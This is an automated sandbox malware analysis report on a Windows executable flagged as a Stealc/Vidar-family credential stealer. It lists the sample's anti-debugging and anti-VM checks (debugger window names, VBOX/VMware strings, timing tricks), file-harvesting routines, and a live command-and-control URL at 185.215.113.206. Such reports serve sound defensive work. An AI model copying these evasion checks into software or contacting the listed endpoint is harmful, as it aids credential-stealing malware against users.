              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F80370 second address: 4F80374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F80374 second address: 4F803A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a movzx esi, dx 0x0000000d push ebx 0x0000000e mov di, cx 0x00000011 pop eax 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FABF0D68608h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCCB0 second address: AFCCB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCCB4 second address: AFCCBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 94F937 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 94FA30 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: AF3DF3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 94D366 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B7DDF2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-27357)
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_0-26175)
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.7 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00713910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00711269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00711250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00714B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00714B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00712390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007016A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00721BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00721BF0
Source: file.exe, file.exe, 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2085798410.0000000001136000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.2085798410.0000000001106000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-26014
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-26181
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-26161
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-26169
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-26033
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-26058
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704A60 VirtualProtect 00000000,00000004,00000100,?, 0_2_00704A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00726390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00726390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00726390 mov eax, dword ptr fs:[00000030h] 0_2_00726390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00722A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00722A40
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match, File source: Process Memory Space: file.exe PID: 2804, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00724610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle, 0_2_00724610
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007246A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 0_2_007246A0
Source: file.exe, file.exe, 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: rProgram Manager
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00722D60
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00722B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00722B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00722A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00722A40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00722C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00722C10

              Stealing of Sensitive Information

Source: Yara match, File source: 00000000.00000003.2044462951.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: file.exe PID: 2804, type: MEMORYSTR
Source: Yara match, File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match, File source: 00000000.00000003.2044462951.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: file.exe PID: 2804, type: MEMORYSTR
Source: Yara match, File source: dump.pcap, type: PCAP
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (13); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Create Account (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
| Source | Detection | Scanner | Label |
| file.exe | 50% | Virustotal | |
| file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
| file.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
| Source | Detection | Scanner | Label |
| http://185.215.113.206/c4becf79229cb002.php/Ct | 100% | Avira URL Cloud | malware |
| http://185.215.113.206/c4becf79229cb002.phpel | 100% | Avira URL Cloud | malware |
| http://185.215.113.206/Vt | 100% | Avira URL Cloud | malware |
| http://185.215.113.206/c4becf79229cb002.phpDt | 100% | Avira URL Cloud | malware |
| http://185.215.113.206/c4becf79229cb002.phpql | 100% | Avira URL Cloud | malware |
| http://185.215.113.206/1t | 100% | Avira URL Cloud | malware |
              No contacted domains info
| Name | Malicious | Antivirus Detection | Reputation |
| http://185.215.113.206/c4becf79229cb002.php | false | | high |
| http://185.215.113.206/ | false | | high |
| 185.215.113.206/c4becf79229cb002.php | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
| http://185.215.113.206/c4becf79229cb002.phpel | file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| http://185.215.113.206/c4becf79229cb002.php/Ct | file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| http://185.215.113.206 | file.exe, 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://185.215.113.206/c4becf79229cb002.phpql | file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| http://185.215.113.206/c4becf79229cb002.phpDt | file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| http://185.215.113.206/Vt | file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| http://185.215.113.206/1t | file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| http://185.215.113.206/5 | file.exe, 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| IP | Domain | Country | ASN | ASN Name | Malicious |
| 185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562847
Start date and time: 2024-11-26 06:45:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 123
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Report size getting too big, too many NtQueryValueKey calls found.
No simulations
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 185.215.113.206 | file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php |
| | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php |
| | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php |
| | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php |
| | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php |
| | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php |
| | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php |
| | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php |
| | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php |
| | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php |
                        No context
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| WHOLESALECONNECTIONSNL | file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206 |
| | file.exe | malicious | LummaC Stealer | 185.215.113.16 |
| | file.exe | malicious | Stealc | 185.215.113.206 |
| | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206 |
| | file.exe | malicious | Stealc | 185.215.113.206 |
| | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206 |
| | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206 |
| | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, Vidar | 185.215.113.206 |
| | file.exe | malicious | Stealc | 185.215.113.206 |
| | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206 |
                        No context
                        No context
                        No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.946197241704331
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
